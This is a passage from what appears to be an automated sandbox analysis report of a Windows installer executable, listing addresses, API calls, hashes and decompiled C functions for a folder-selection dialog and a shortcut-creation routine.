                                                                        0x00404980
                                                                        0x00404987
                                                                        0x00404991
                                                                        0x00404991
                                                                        0x00404995
                                                                        0x0040499a
                                                                        0x0040499f
                                                                        0x004049b5
                                                                        0x004049a1
                                                                        0x004049a1
                                                                        0x004049a9
                                                                        0x004049b0
                                                                        0x004049ab
                                                                        0x004049ab
                                                                        0x004049ab
                                                                        0x004049a9
                                                                        0x004049b9
                                                                        0x004049bb
                                                                        0x004049c9
                                                                        0x004049ca
                                                                        0x004049d6
                                                                        0x004049d9
                                                                        0x004049d9
                                                                        0x0040499a
                                                                        0x00000000
                                                                        0x00404987
                                                                        0x0040496b
                                                                        0x00404972
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404a2f
                                                                        0x00404a2f
                                                                        0x00404a36
                                                                        0x00404aaa
                                                                        0x00404ab1
                                                                        0x00404abd
                                                                        0x00404abd
                                                                        0x00404ac6
                                                                        0x00404ac8
                                                                        0x00404acf
                                                                        0x00404ad2
                                                                        0x00404ad2
                                                                        0x00404ad8
                                                                        0x00404adf
                                                                        0x00404ae2
                                                                        0x00404ae2
                                                                        0x00404ae8
                                                                        0x00404aee
                                                                        0x00404af4
                                                                        0x00404af4
                                                                        0x00404b01
                                                                        0x00404c4e
                                                                        0x00404c55
                                                                        0x00404c72
                                                                        0x00404c78
                                                                        0x00404c8a
                                                                        0x00404c8a
                                                                        0x00000000
                                                                        0x00404b07
                                                                        0x00404b09
                                                                        0x00404b11
                                                                        0x00404b15
                                                                        0x00404b15
                                                                        0x00404b1d
                                                                        0x00404b5e
                                                                        0x00404b60
                                                                        0x00404b70
                                                                        0x00404b73
                                                                        0x00404b78
                                                                        0x00404b7f
                                                                        0x00404b82
                                                                        0x00404c24
                                                                        0x00404c2a
                                                                        0x00404c38
                                                                        0x00404c49
                                                                        0x00404c49
                                                                        0x00000000
                                                                        0x00404c38
                                                                        0x00404b88
                                                                        0x00404b8b
                                                                        0x00404b91
                                                                        0x00404b96
                                                                        0x00404b98
                                                                        0x00404b9a
                                                                        0x00404ba0
                                                                        0x00404ba7
                                                                        0x00404bac
                                                                        0x00404bb3
                                                                        0x00404bb6
                                                                        0x00404bb6
                                                                        0x00404bbd
                                                                        0x00404bc9
                                                                        0x00404bcd
                                                                        0x00404bcf
                                                                        0x00404bcf
                                                                        0x00404bbf
                                                                        0x00404bc1
                                                                        0x00404bc1
                                                                        0x00404bef
                                                                        0x00404bfb
                                                                        0x00404c0a
                                                                        0x00404c0a
                                                                        0x00404c0c
                                                                        0x00404c0f
                                                                        0x00404c18
                                                                        0x00000000
                                                                        0x00404b1f
                                                                        0x00404b2a
                                                                        0x00404b2d
                                                                        0x00404b32
                                                                        0x00404b34
                                                                        0x00404b38
                                                                        0x00404b48
                                                                        0x00404b52
                                                                        0x00404b54
                                                                        0x00404b57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404b3a
                                                                        0x00404b3a
                                                                        0x00404b40
                                                                        0x00404b42
                                                                        0x00404b42
                                                                        0x00404b43
                                                                        0x00404b44
                                                                        0x00000000
                                                                        0x00404b3a
                                                                        0x00404b1d
                                                                        0x00404b01
                                                                        0x00404a3e
                                                                        0x00000000
                                                                        0x00404a54
                                                                        0x00404a5e
                                                                        0x00404a63
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404a75
                                                                        0x00404a7a
                                                                        0x00404a86
                                                                        0x00404a86
                                                                        0x00404a88
                                                                        0x00404a97
                                                                        0x00404a99
                                                                        0x00404aa0
                                                                        0x00404aa3
                                                                        0x00000000
                                                                        0x00404aa3
                                                                        0x00404a3e
                                                                        0x004046fb
                                                                        0x00404700
                                                                        0x0040470a
                                                                        0x0040470b
                                                                        0x00404714
                                                                        0x0040471f
                                                                        0x0040473a
                                                                        0x0040474c
                                                                        0x00404751
                                                                        0x0040475c
                                                                        0x00404765
                                                                        0x0040477a
                                                                        0x0040478b
                                                                        0x00404798
                                                                        0x00404798
                                                                        0x0040479d
                                                                        0x004047a3
                                                                        0x004047a5
                                                                        0x004047a8
                                                                        0x004047ad
                                                                        0x004047b2
                                                                        0x004047b4
                                                                        0x004047b4
                                                                        0x004047b7
                                                                        0x004047b8
                                                                        0x004047d4
                                                                        0x004047d4
                                                                        0x004047d6
                                                                        0x004047d7
                                                                        0x004047dc
                                                                        0x004047df
                                                                        0x004047e2
                                                                        0x004047e6
                                                                        0x004047eb
                                                                        0x004047f0
                                                                        0x004047f4
                                                                        0x004047f9
                                                                        0x004047fe
                                                                        0x00404800
                                                                        0x00404808
                                                                        0x004048d2
                                                                        0x004048e5
                                                                        0x00000000
                                                                        0x0040480e
                                                                        0x00404811
                                                                        0x00404814
                                                                        0x00404817
                                                                        0x00404817
                                                                        0x0040481d
                                                                        0x00404823
                                                                        0x00404826
                                                                        0x0040482c
                                                                        0x0040482d
                                                                        0x00404832
                                                                        0x0040483b
                                                                        0x00404842
                                                                        0x00404845
                                                                        0x00404848
                                                                        0x0040484b
                                                                        0x00404887
                                                                        0x004048b0
                                                                        0x00404889
                                                                        0x00404896
                                                                        0x00404896
                                                                        0x0040484d
                                                                        0x00404850
                                                                        0x0040485f
                                                                        0x00404869
                                                                        0x00404871
                                                                        0x00404878
                                                                        0x00404880
                                                                        0x00404880
                                                                        0x0040484b
                                                                        0x004048b6
                                                                        0x004048b7
                                                                        0x004048c3
                                                                        0x004048c3
                                                                        0x004048d0
                                                                        0x004048eb
                                                                        0x004048ef
                                                                        0x0040490c
                                                                        0x00404911
                                                                        0x00404914
                                                                        0x00000000
                                                                        0x004048f1
                                                                        0x004048f6
                                                                        0x004048ff
                                                                        0x00404c8c
                                                                        0x00404c9e
                                                                        0x00404c9e
                                                                        0x004048ef
                                                                        0x00000000
                                                                        0x004048d0
                                                                        0x00404808

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 004046BE
                                                                        • GetDlgItem.USER32 ref: 004046CB
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                        • LoadBitmapA.USER32 ref: 0040472A
                                                                        • SetWindowLongA.USER32 ref: 0040473D
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                        • DeleteObject.GDI32(?), ref: 0040479D
                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                        • GetWindowLongA.USER32 ref: 004048D7
                                                                        • SetWindowLongA.USER32 ref: 004048E5
                                                                        • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                        • GlobalFree.KERNEL32 ref: 00404AE2
                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                        • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                        • GetDlgItem.USER32 ref: 00404C83
                                                                        • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 1638840714-813528018
                                                                        • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                        • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                        • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                        • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                        				int _v8;
                                                                        				signed int _v12;
                                                                        				long _v16;
                                                                        				long _v20;
                                                                        				char _v24;
                                                                        				long _v28;
                                                                        				char _v32;
                                                                        				intOrPtr _v36;
                                                                        				long _v40;
                                                                        				signed int _v44;
                                                                        				CHAR* _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				CHAR* _v68;
                                                                        				void _v72;
                                                                        				char _v76;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t75;
                                                                        				signed char* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				int _t86;
                                                                        				int _t88;
                                                                        				int _t100;
                                                                        				signed int _t105;
                                                                        				char* _t110;
                                                                        				intOrPtr _t114;
                                                                        				intOrPtr* _t128;
                                                                        				signed int _t140;
                                                                        				signed int _t145;
                                                                        				CHAR* _t151;
                                                                        
                                                                        				_t75 =  *0x79ed58;
                                                                        				_v36 = _t75;
                                                                        				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
                                                                        				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                                                        				if(_a8 == 0x40b) {
                                                                        					E004052A3(0x3fb, _t151);
                                                                        					E00405BFB(_t151);
                                                                        				}
                                                                        				if(_a8 != 0x110) {
                                                                        					L8:
                                                                        					if(_a8 != 0x111) {
                                                                        						L19:
                                                                        						if(_a8 == 0x40f) {
                                                                        							L21:
                                                                        							_v8 = _v8 & 0x00000000;
                                                                        							_v12 = _v12 & 0x00000000;
                                                                        							_t145 = _t144 | 0xffffffff;
                                                                        							E004052A3(0x3fb, _t151);
                                                                        							if(E004055AC(_t169, _t151) == 0) {
                                                                        								_v8 = 1;
                                                                        							}
                                                                        							E004059BF(0x79e550, _t151);
                                                                        							_t80 = E0040555F(0x79e550);
                                                                        							if(_t80 != 0) {
                                                                        								 *_t80 =  *_t80 & 0x00000000;
                                                                        							}
                                                                        							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
                                                                        							if(_t81 == 0) {
                                                                        								L28:
                                                                        								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
                                                                        								__eflags = _t86;
                                                                        								if(_t86 == 0) {
                                                                        									goto L31;
                                                                        								}
                                                                        								_t100 = _v20 * _v28;
                                                                        								__eflags = _t100;
                                                                        								_t145 = MulDiv(_t100, _v16, 0x400);
                                                                        								goto L30;
                                                                        							} else {
                                                                        								_push( &_v32);
                                                                        								_push( &_v24);
                                                                        								_push( &_v44);
                                                                        								_push(0x79e550);
                                                                        								if( *_t81() == 0) {
                                                                        									goto L28;
                                                                        								}
                                                                        								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                        								L30:
                                                                        								_v12 = 1;
                                                                        								L31:
                                                                        								if(_t145 < E004045FA(5)) {
                                                                        									_v8 = 2;
                                                                        								}
                                                                        								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
                                                                        									E00404545(0x3ff, 0xfffffffb, _t87);
                                                                        									if(_v12 == 0) {
                                                                        										SetDlgItemTextA(_a4, 0x400, 0x79e540);
                                                                        									} else {
                                                                        										E00404545(0x400, 0xfffffffc, _t145);
                                                                        									}
                                                                        								}
                                                                        								_t88 = _v8;
                                                                        								 *0x7a3024 = _t88;
                                                                        								if(_t88 == 0) {
                                                                        									_v8 = E00401410(7);
                                                                        								}
                                                                        								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                                                        									_v8 = 0;
                                                                        								}
                                                                        								E00403DC9(0 | _v8 == 0x00000000);
                                                                        								if(_v8 == 0 &&  *0x79f570 == 0) {
                                                                        									E0040417A();
                                                                        								}
                                                                        								 *0x79f570 = 0;
                                                                        								goto L45;
                                                                        							}
                                                                        						}
                                                                        						_t169 = _a8 - 0x405;
                                                                        						if(_a8 != 0x405) {
                                                                        							goto L45;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t105 = _a12 & 0x0000ffff;
                                                                        					if(_t105 != 0x3fb) {
                                                                        						L12:
                                                                        						if(_t105 == 0x3e9) {
                                                                        							_t140 = 7;
                                                                        							memset( &_v72, 0, _t140 << 2);
                                                                        							_t144 = 0x79f580;
                                                                        							_v76 = _a4;
                                                                        							_v68 = 0x79f580;
                                                                        							_v56 = E004044DF;
                                                                        							_v52 = _t151;
                                                                        							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
                                                                        							_t110 =  &_v76;
                                                                        							_v60 = 0x41;
                                                                        							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
                                                                        							if(_t110 == 0) {
                                                                        								_a8 = 0x40f;
                                                                        							} else {
                                                                        								E0040521C(0, _t110);
                                                                        								E004054CC(_t151);
                                                                        								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
                                                                        								if(_t114 != 0) {
                                                                        									_push(_t114);
                                                                        									_push(0);
                                                                        									E004059E1(0x3fb, 0x79f580, _t151);
                                                                        									_t144 = 0x7a1f20;
                                                                        									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
                                                                        										lstrcatA(_t151, 0x7a1f20);
                                                                        									}
                                                                        								}
                                                                        								 *0x79f570 =  *0x79f570 + 1;
                                                                        								SetDlgItemTextA(_a4, 0x3fb, _t151);
                                                                        							}
                                                                        						}
                                                                        						goto L19;
                                                                        					}
                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                        						goto L45;
                                                                        					}
                                                                        					_a8 = 0x40f;
                                                                        					goto L12;
                                                                        				} else {
                                                                        					_t144 = GetDlgItem(_a4, 0x3fb);
                                                                        					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
                                                                        						E004054CC(_t151);
                                                                        					}
                                                                        					 *0x7a2758 = _a4;
                                                                        					SetWindowTextA(_t144, _t151);
                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                        					_push(1);
                                                                        					E00403DA7(_a4);
                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        					_push(0x14);
                                                                        					E00403DA7(_a4);
                                                                        					E00403DDC(_t144);
                                                                        					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
                                                                        					if(_t128 == 0) {
                                                                        						L45:
                                                                        						return E00403E0E(_a8, _a12, _a16);
                                                                        					}
                                                                        					 *_t128(_t144, 1);
                                                                        					goto L8;
                                                                        				}
                                                                        			}




































                                                                        0x004041eb
                                                                        0x004041f2
                                                                        0x004041fe
                                                                        0x0040420c
                                                                        0x00404214
                                                                        0x00404218
                                                                        0x0040421e
                                                                        0x0040421e
                                                                        0x0040422a
                                                                        0x004042a4
                                                                        0x004042ab
                                                                        0x00404377
                                                                        0x0040437e
                                                                        0x0040438d
                                                                        0x0040438d
                                                                        0x00404391
                                                                        0x00404397
                                                                        0x0040439a
                                                                        0x004043a7
                                                                        0x004043a9
                                                                        0x004043a9
                                                                        0x004043b7
                                                                        0x004043bd
                                                                        0x004043c4
                                                                        0x004043c6
                                                                        0x004043c6
                                                                        0x004043d3
                                                                        0x004043df
                                                                        0x00404403
                                                                        0x00404414
                                                                        0x0040441a
                                                                        0x0040441c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404422
                                                                        0x00404422
                                                                        0x00404430
                                                                        0x00000000
                                                                        0x004043e1
                                                                        0x004043e4
                                                                        0x004043e8
                                                                        0x004043ec
                                                                        0x004043ed
                                                                        0x004043f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004043fa
                                                                        0x00404432
                                                                        0x00404432
                                                                        0x00404439
                                                                        0x00404442
                                                                        0x00404444
                                                                        0x00404444
                                                                        0x00404456
                                                                        0x00404460
                                                                        0x00404468
                                                                        0x0040447e
                                                                        0x0040446a
                                                                        0x0040446e
                                                                        0x0040446e
                                                                        0x00404468
                                                                        0x00404483
                                                                        0x00404488
                                                                        0x0040448d
                                                                        0x00404496
                                                                        0x00404496
                                                                        0x0040449f
                                                                        0x004044a1
                                                                        0x004044a1
                                                                        0x004044ad
                                                                        0x004044b5
                                                                        0x004044bf
                                                                        0x004044bf
                                                                        0x004044c4
                                                                        0x00000000
                                                                        0x004044c4
                                                                        0x004043df
                                                                        0x00404380
                                                                        0x00404387
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404387
                                                                        0x004042b1
                                                                        0x004042b7
                                                                        0x004042d1
                                                                        0x004042d6
                                                                        0x004042e0
                                                                        0x004042e7
                                                                        0x004042ec
                                                                        0x004042f6
                                                                        0x004042f9
                                                                        0x004042fc
                                                                        0x00404303
                                                                        0x0040430b
                                                                        0x0040430e
                                                                        0x00404312
                                                                        0x00404319
                                                                        0x00404321
                                                                        0x00404370
                                                                        0x00404323
                                                                        0x00404324
                                                                        0x0040432a
                                                                        0x00404334
                                                                        0x0040433c
                                                                        0x0040433e
                                                                        0x0040433f
                                                                        0x00404341
                                                                        0x00404347
                                                                        0x00404355
                                                                        0x00404359
                                                                        0x00404359
                                                                        0x00404355
                                                                        0x0040435e
                                                                        0x00404369
                                                                        0x00404369
                                                                        0x00404321
                                                                        0x00000000
                                                                        0x004042d6
                                                                        0x004042c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004042ca
                                                                        0x00000000
                                                                        0x0040422c
                                                                        0x00404237
                                                                        0x00404240
                                                                        0x0040424d
                                                                        0x0040424d
                                                                        0x00404257
                                                                        0x0040425c
                                                                        0x00404265
                                                                        0x00404268
                                                                        0x0040426d
                                                                        0x00404275
                                                                        0x00404278
                                                                        0x0040427d
                                                                        0x00404283
                                                                        0x00404292
                                                                        0x00404299
                                                                        0x004044ca
                                                                        0x004044dc
                                                                        0x004044dc
                                                                        0x004042a2
                                                                        0x00000000
                                                                        0x004042a2

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00404230
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                        • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                        • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                        • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                        • SetDlgItemTextA.USER32 ref: 00404369
                                                                          • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                        • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                        • SetDlgItemTextA.USER32 ref: 0040447E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                        • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                        • API String ID: 2007447535-1909522251
                                                                        • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                        • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                        • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                        • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E004020A6(void* __eflags) {
                                                                        				void* _t44;
                                                                        				intOrPtr* _t48;
                                                                        				intOrPtr* _t50;
                                                                        				intOrPtr* _t52;
                                                                        				intOrPtr* _t54;
                                                                        				signed int _t58;
                                                                        				intOrPtr* _t59;
                                                                        				intOrPtr* _t62;
                                                                        				intOrPtr* _t64;
                                                                        				intOrPtr* _t66;
                                                                        				intOrPtr* _t69;
                                                                        				intOrPtr* _t71;
                                                                        				int _t75;
                                                                        				signed int _t81;
                                                                        				intOrPtr* _t88;
                                                                        				void* _t95;
                                                                        				void* _t96;
                                                                        				void* _t100;
                                                                        
                                                                        				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
                                                                        				_t96 = E00402A9A(0xffffffdf);
                                                                        				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
                                                                        				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
                                                                        				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
                                                                        				if(E00405538(_t96) == 0) {
                                                                        					E00402A9A(0x21);
                                                                        				}
                                                                        				_t44 = _t100 + 8;
                                                                        				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
                                                                        				if(_t44 < _t75) {
                                                                        					L12:
                                                                        					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                        					_push(0xfffffff0);
                                                                        				} else {
                                                                        					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                        					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
                                                                        					if(_t95 >= _t75) {
                                                                        						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                        						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                        						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                        						_t81 =  *(_t100 - 0x14);
                                                                        						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                        						if(_t58 != 0) {
                                                                        							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                        							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                        							_t81 =  *(_t100 - 0x14);
                                                                        						}
                                                                        						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                                                        							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                        							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                                                        						}
                                                                        						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                        						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                        						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                        						if(_t95 >= _t75) {
                                                                        							 *0x409418 = _t75;
                                                                        							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
                                                                        							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                        							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
                                                                        						}
                                                                        						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                        						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                        					}
                                                                        					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                        					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                        					if(_t95 >= _t75) {
                                                                        						_push(0xfffffff4);
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        				E00401428();
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
                                                                        				return 0;
                                                                        			}





















                                                                        0x004020af
                                                                        0x004020b9
                                                                        0x004020c2
                                                                        0x004020cc
                                                                        0x004020d5
                                                                        0x004020df
                                                                        0x004020e3
                                                                        0x004020e3
                                                                        0x004020e8
                                                                        0x004020f9
                                                                        0x00402101
                                                                        0x004021df
                                                                        0x004021df
                                                                        0x004021e6
                                                                        0x00402107
                                                                        0x00402107
                                                                        0x00402118
                                                                        0x0040211c
                                                                        0x00402122
                                                                        0x0040212c
                                                                        0x0040212e
                                                                        0x00402139
                                                                        0x0040213c
                                                                        0x00402149
                                                                        0x0040214b
                                                                        0x0040214d
                                                                        0x00402154
                                                                        0x00402157
                                                                        0x00402157
                                                                        0x0040215a
                                                                        0x00402164
                                                                        0x0040216c
                                                                        0x00402171
                                                                        0x0040217d
                                                                        0x0040217d
                                                                        0x00402180
                                                                        0x00402189
                                                                        0x0040218c
                                                                        0x00402195
                                                                        0x0040219a
                                                                        0x004021ac
                                                                        0x004021b5
                                                                        0x004021bb
                                                                        0x004021c7
                                                                        0x004021c7
                                                                        0x004021c9
                                                                        0x004021cf
                                                                        0x004021cf
                                                                        0x004021d2
                                                                        0x004021d8
                                                                        0x004021dd
                                                                        0x004021f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004021dd
                                                                        0x004021e8
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                        Strings
